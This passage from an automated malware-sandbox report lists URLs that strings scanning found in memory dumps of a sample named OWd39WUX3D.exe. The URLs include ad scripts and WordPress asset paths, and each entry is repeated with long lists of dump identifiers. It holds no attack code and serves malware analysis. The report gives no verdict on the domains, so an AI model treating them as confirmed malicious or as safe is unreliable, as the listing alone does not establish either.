00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/202.html
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/204.html
              Source: OWd39WUX3D.exe, 00000000.00000003.389531364.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583385191.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.397206589.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=x0c.com&pid=9PO755G95
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.598883305.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://johnmorello.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mobilnic.net/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/dynamic-visibility-for-elementor//assets/css/dynamic-visibili
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.16.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/widget-nav-menu.min.css
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.16.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.16.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.16.1
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.16
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.16.3
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/modules/lazyload/frontend.min.css?ver=3.
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.16.3
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.16.3
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.16.3
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.16.3
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.16.3
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.16
